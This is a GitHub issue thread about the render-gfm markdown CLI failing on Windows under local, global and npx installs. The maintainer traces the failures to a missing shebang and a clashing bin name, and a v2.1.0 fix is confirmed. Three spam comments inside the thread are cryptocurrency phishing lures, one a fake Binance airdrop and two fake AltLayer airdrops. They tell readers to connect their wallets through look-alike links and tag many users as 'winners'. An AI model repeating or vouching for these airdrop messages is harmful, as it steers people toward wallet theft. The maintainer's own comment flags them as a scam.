### ISSUE TITLE
Is the CLI alive? Not working with local install, global install, and npx

### ISSUE THREAD

**Issue by Phroneris** [shaunbharat/render-gfm#6]
I can't use this CLI feature `gfm` in any ways.
I tried local install, global install, and `npx`, but all failed.

### Specs

- OS: Windows 10 Home 64-bit 22H2
- Language/Region: Japanese/Japan
  - But my username uses only [0-9a-zA-Z] characters
- Shell: GNU bash, version 5.2.15(1)-release (x86_64-pc-msys) via Git for Windows
- npm: 10.2.3 via nvm 1.1.11

#### Steps

1. Create `C:/tmp` directory
2. Create `test.md` file here, write some markdown, and save
3. Open the shell and `cd` into the directory

#### Steps

1. Run `npm init`
2. Run `npm install render-gfm`
3. In `package.json` > `"scripts"`, add `"gfm": "gfm ./test.md"` entry
4. Run `npm run gfm`

#### Result

![image](https://github.com/shaunbharat/render-gfm/assets/9891867/b7cf5c5e-fb47-4197-b824-3b757fa8f251)

Translation:

```
Script: C:\tmp\node_modules\render-gfm\cli.js
Line:   1
Char:   1
Error:  Syntax error
Code:   800A03EA
Source: Microsoft JScript compilation error
```
#### Steps

1. Run `npm uninstall render-gfm` 
2. Run `npm install -g render-gfm`
3. Run `gfm ./test.md`

#### Result

```
C:\Program Files\nodejs/node_modules/render-gfm/cli.js: line 1: const: command not found
C:\Program Files\nodejs/node_modules/render-gfm/cli.js: line 2: import: command not found
C:\Program Files\nodejs/node_modules/render-gfm/cli.js: line 3: import: command not found
C:\Program Files\nodejs/node_modules/render-gfm/cli.js: line 4: syntax error near unexpected token `('
C:\Program Files\nodejs/node_modules/render-gfm/cli.js: line 4: `const cli = new Command();'
```

#### Steps

1. Run `npm uninstall -g render-gfm`
2. Run `npx clear-npx-cache`
3. Run `npx gfm ./test.md`

#### Result

A help is just shown.

```
  Usage: gfm [options]

  Options:

    -h, --help                output usage information
    -s, --source <path>       source file or directory where the markdown files
                              are localed [.]

    -g, --generate            converts GitHub flavored markdown files to
                              highlighted html
    -d, --destination <path>  destination file or directory where the html files
                              are generated [. if source is a directory, removed
                              .md and ended in .html if source is a file]
    -e, --exclude <paths>     excludes files and directories
    -c, --compact             generates single html files without external
                              resources

    -l, --live                starts a local server to live preview the markdown
                              files
    -p, --port <number>       local server port number [4040]
```

Thanks.

**Comment by shaunbharat** [comment]
Thank you for all of this information! It helped me a bunch.

I was able to reproduce the same situation when you tried a global install, with a Gitpod instance. It appears that the file is getting fed to bash instead of being interpreted by Node.js, as seen by bash trying to run the Javascript keywords as commands. This might be a problem with Node.js / npm / bash, or it may just need a proper shebang at the start of the file for bash. I'm not sure how this works. When locally installed, it looks like the Javascript file (cli.js) is also not getting interpreted by Node.js, but actually by Microsoft JScript (on my Windows system it opens up in Visual Studio Code for some reason). And when using `npx gfm`, the package being downloaded and executed is not this project render-gfm, it's a completely different one. The help menu you received and the one that render-gfm prints are different. I was going to suggest cloning the repository and running `node cli.js -o dist README.md` directly as a temporary workaround, but even that is buggy (this is for sure due to the code).

I think something broke along the way, since it's been two years since I last touched this project (which has kind of sloppy code). I would need to look into this deeper later to try and fix things or find out what's wrong when I have time. In the meantime, if you need this GitHub Flavoured Markdown functionality, you can try an alternative somewhere, or try using Windows Terminal / Command Prompt instead of GNU bash via Git for Windows. I doubt this would work anyway because of the new bugs that are probably related to the dependencies of render-gfm. Anyone is welcome to open a PR or try to fix it as well. Sorry for the inconvenience.

**Comment by Phroneris** [comment]
Thank you for your quick response!

I'm surprised that `npx gfm` and installed `gfm` are different, but also convinced because the `npx` one isn't `render-gfm`.

I also tried on Macbook (not of mine) the other day.
The result was maybe similar to the global install version, but I don't remember details.

Anyway, I look forward the fix!

**Comment by shaunbharat** [comment]
You're welcome! I have made progress on a few fixes and changes. I've been busy but expect a working version soon. I'm also looking into the problems with using the CLI on a shell like bash. I'll add a shebang (`#!/usr/bin/env node`) to the start of the CLI file, but it may need to be adjusted for Git Bash for Windows.

Also, I'll be changing the bin name from gfm to render-gfm for consistency, so there should not be any confusion next time. The CLI will be installed using `npm i -g render-gfm` and executed with `render-gfm`, or installed and executed with `npx render-gfm`.

Thanks for your patience!

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by shaunbharat** [comment]
Hi, thanks for waiting, I finally had time after my exams.

I fixed all these things for v2.1.0, and the `generate-github-markdown-css` dependency is also fixed for now. Run `npx render-gfm` and it should work now.

Close the issue once you verify it works, or feel free to let me know if there are any bugs or things that I missed.

**Comment by Bhanderi-Aksahy** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @terryyy-eth, @danstarns, @eteryko, @IShouldCodeMoreOften, @patinbg, @Puppetmastr01, @pewil83, @zhuang1234, @fabian0010, @Nuramin321, @akhilesh-w, @PlanemoMaxim, @efimweb, @otiizgithub, @fkztw, @x-SERZH-x, @pradyuman, @Cmion, @10Macit, @chrislearn, @GVCrypto, @huyhoangphan29, @geofmureithi-zz, @sanoyo, @soub4i, @ashwinp-r, @gnapoli23, @yuhao-git-star, @brainsoftca, @nikolaygit

**Comment by shaunbharat** [comment]
If you got mentioned here, the above is a scam/spam. I get mentioned a lot as well and I'm not sure why GitHub has not done anything about it yet.

**Comment by AshvinGudaliya** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @flaseen, @waliahd, @badams, @Stridsvagn69420, @asuna, @TimyIsCool, @jspilman, @hicho02, @hita1999, @Pandafluff025, @garlicbulb-puzhuo, @rovemind, @3zbumban, @JogJohgoeg, @godfuzz3r, @AmroAbdulla, @h1994st, @astrapi69, @WWelna, @kwame998

**Comment by Phroneris** [comment]
Then I tested v2.1.0 in three ways:

- Local Install:
  1. Run `npm init`
  2. Run `npm install render-gfm@2.1.0`
  3. In `package.json` > `"scripts"`, edit `"test"` entry:
     - `"test": "render-gfm markdown -o 1-local ./test.md && render-gfm themes -o 1-local/css"`
  4. Run `npm run test`
- Global Install:
  1. Run `npm uninstall render-gfm` 
  2. Run `npm install -g render-gfm@2.1.0`
  3. Run `render-gfm markdown -o 2-global ./test.md`
  4. Run `render-gfm themes -o 2-global/css`
- `npx`:
  1. Run `npm uninstall -g render-gfm`
  2. Run `npx clear-npx-cache`
  3. Run `npx render-gfm@2.1.0 markdown -o 3-npx ./test.md`
  4. Run `npx render-gfm@2.1.0 themes -o 3-npx/css`

...and confirmed all of them responds **fine** as a CLI tool!
Thanks a lot for working on it!!

I close this issue as the root problem has been fixed, but there are some small things I found:

- `render-gfm themes -h` says that the `-o` option defaults to `'dist'`, but I feel it should say `'dist/css'` because specifing `-o mydir` results in generating `mydir/*.css` instead of `mydir/css/*.css`.
- The "about" link on the top right of the GitHub repository page hasn't been updated yet.

**Comment by shaunbharat** [comment]
I appreciate your thorough feedback, and thank you for pointing out the things I missed! I'm glad the CLI works fine now. If you discover any other issues while using the tool or have some suggestions, I'd be happy to hear them.
